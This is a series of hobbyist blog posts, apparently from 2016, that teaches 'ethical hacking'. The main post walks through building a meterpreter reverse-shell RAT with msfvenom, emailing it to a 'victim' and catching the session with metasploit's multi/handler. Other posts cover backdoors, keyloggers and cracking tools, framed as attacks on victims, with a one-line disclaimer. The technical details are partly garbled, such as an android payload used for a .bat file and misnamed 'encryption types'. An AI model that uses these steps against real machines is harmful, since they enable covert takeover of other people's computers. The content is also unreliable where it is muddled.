Wednesday, August 24, 2016

How to hack pc using metasploit (on the LAN)

Hello hackers I am back with some fresh hacking tutorials. Today we are gonna learn how to hack a pc using metasploit. So here we go.

STEP 1: Fire up Kali Linux and open its terminal.



















STEP 2: Create a RAT file. Type as I do using this pattern.

msfvenom  -p (payload) LHOST=(your ip address) LPORT=(vulnerable port) > (filename).bat

[Don't put brackets]














Here you can give any payloads if you are beginner than use this payload

In the picture,
android/meterpreter/reverse_tcp = payload
127.0.0.1 = ip address
4000 = Port
test =file name [the extension must be bat or exe. Don't put extension apk ]


STEP 3 : Send the  file to your victim using USB , internet is the best way. You can also send it using email attachment (mostly used method).


STEP 4: Open metasploit console by typing msfconsole in the terminal.

STEP 5 : After opening metasploit framework. Type use multi/handler.

STEP 6 :Configure it in the same way as the RAT file.
                TYPE THE FOLLOWINGS:
 1. set payload windows/meterpreter/reverse_tcp
 2. set LHOST (your ip address)    [DONT USE BRACKET]
 3.set LPORT  4000                        [YOU CAN USE ANY VULNERABLE PORT AS YOU LIKE]


4. Now its time to exploit Type exploit and press enter.

 5.Now when the victim will open your RAT file meterpreter session will be open and you will be able to play with victim files. To learn more commands for using victim pc type help .


  That's the way you a persons PC using metaspolit. Thanks for the view. Comment your queries below. For more please follow my blog.

   












Ethical hacking Part 3 (Steps for hacking)

   Hey everyone I am back with some hacking knowledge. As I promised today we are learning the steps for a successful hack. So here are the steps:

STEP 1: Footprinting  :
                    Footprinting (also known as reconnaissance) is the technique used for gathering information about computer systems and the entities they belong to. To get this information, a hacker might use various tools and technologies. This information is very useful to a hacker who is trying to crack a whole system.  This information might be IP address, vulnerable port or some more information about the system.

STEP 2 : Gaining access :
                    Next step is gaining access to the system. For gaining access to the system you might attack the victim IP or you may execute RAT file in the system. This will let you access the victim system.

STEP 3 : Maintaining access :
                    Gaining access is not enough your must maintain the access to the victim system. You can do it by installing backdoor in the victim system. After installing backdoor in the victims system you can access it any time you want.


So, these are the steps for successful hacking. So the introduction to hacking part is over now in the next post I will show you how to hack victim pc using metasploit. Thanks for the view comment your queries below and follow my blog for more.

Tuesday, August 23, 2016

Ethical hacking Part 2 (Terms used in hacking)

      Hello hackers I am back with the new post on ethical hacking. In this I am gonna teach you some basic terms of hacking. You will be facing this terms during hacking. Without learning this terms it would be difficult for you to get the knowledge of hacking.They are:

1)RAT -A remote administration tool (RAT) is a piece of software that allows a remote "operator" to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. A RAT is created in kali Linux using msfvenom and msfpayload. We will be leaning about the creation of RAT in the future tutorials.

2)Payload - Payload refers to the part of malware which performs a malicious action. In the analysis of malicious software such as worms, viruses and Trojans, it refers to the software's harmful results. Examples of payloads from malware include code for deleting data, displaying messages with insulting text or sending spurious email messages to a large number of people. During process of hacking a hacker configures the payload in the RAT file , which is send to the victim. 

3)DOS or DDOS - Most of you may have heard about it. DOS stands for denial of service and DDOS stands for distributed denial of service. It is the process by which a hacker overloads the server with more requests than the server can handle. If a individual does it then it is DOS but if many computers and hackers are involved then it is DDOS. DDOS requires a bit programming knowledge and its a bit difficult than other hacking so we will be doing it later on. 

4)Backdoor - A backdoor is a method, often secret, of bypassing normal authentication in a product, computer system, cryptosystem or algorithm etc. Backdoors are often used for securing unauthorized remote access to a computer, or obtaining access to plaintext in cryptographic systems. A backdoor is a program created by a hacker to maintain the access on the victims PC. A backdoor is a script that runs on the background of victim device giving hacker full access to the device. After we access the victim PC using metasploit then we must run backdoor on victim PC otherwise if somehow we get disconnected from the victim PC then we can't get re-access. So backdoor is essential.

5)Password hashes - In computer password are not stored in plain text. They are stored in a rule  which is called encryption. There are different types of encryption such as SAM,AES, SHADOW .et
c. We obtain password hashes through various ways of hacking which I will be teaching on future tutorials.

6) Keylogging - Keylogging  is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Keylogger is a piece of software used for keylogging. It is mostly using in finding the password. A hacker executes keylogger in the victim PC and it monitors the keystokes and information is send to the hacker remotely. Hence, the hacker gets the password. We can execute the keylogger into the system through various ways such as hacking the system, writing a auto run script of keylogger in USB etc. We will getting through it later. I will post a full tutorial on Keylogging.


These are the basic terms of hacking you must know these terms to have a good start on hacking. In the next post I would show you the steps for the successful hacking. Thanks for the views. Please put your comments below to let me know your queries. Share my blog to your friends and please support us.

Monday, August 22, 2016

Ethical Hacking Part-1 (Getting started)

          Here I will be teaching you hacking tips and tricks from beginning to end. Note that you can't become a hacker in just few days. It requires a lot of patience and hard work. Don't use the knowledge I gave you for illegal purposes. Okay fresh start , first to start your hacking life you need to install a different OS i.e Linux or Unix and you shall install some basic tools for hacking.
         The operating system you can use for hacking are as follows:
1)Kali Linux
          Kali Linux is a Linux designed by offensive security for penetration testing purposes. I also use Kali Linux because it comes with pre-installed tool. Over 600 penetration testing tools comes with kali Linux.
2)Backtrack
           Backtrack is very similar to kali Linux. It also comes with pre-installed tools.
3)Fedora Linux
           Most of the people also use fedora Linux. It don't have pre-installed tools but you can download it.
4)Red Hat Linux
           Red Hat Linux is one of the most popular Linux distribution. It is mostly used by hacker, programmers and IT specialist.
 

         Beyond this OS you can try other Linux such as Ubuntu. Just install it then if their are pre-install tools then no problem. But if there are not the tools install them. These are the most famous hacking tools:
1) Metasploit (for hacking system)
2)Setoolkit (social engineering)
3)THC-Hydra (for online password cracking)
4)John the Ripper (offline password cracking)
5)hashcat (password cracking )
6)Aircrack-ng (wifi password cracking)
7)Reaver (wifi hacking)
8)Wifite (wifi hacking)
9)Nmap (Scanning)
10)Brup-suite (Used with hydra for online password cracking)

        These are the various tools you need before starting as hacker. There are many other tools but you need only this tools to get started as hacker.


          Hope this might have helped you I will be writing about more in the future. Visit my blog for more. I would be writing on specific tutorials on how to hack pc, wifi and other once this introduction phase is over. You need to know this basic before getting to the main section. Thanks for the view. If you have any complaint, doubt or queries then feel free to ask on the comment section.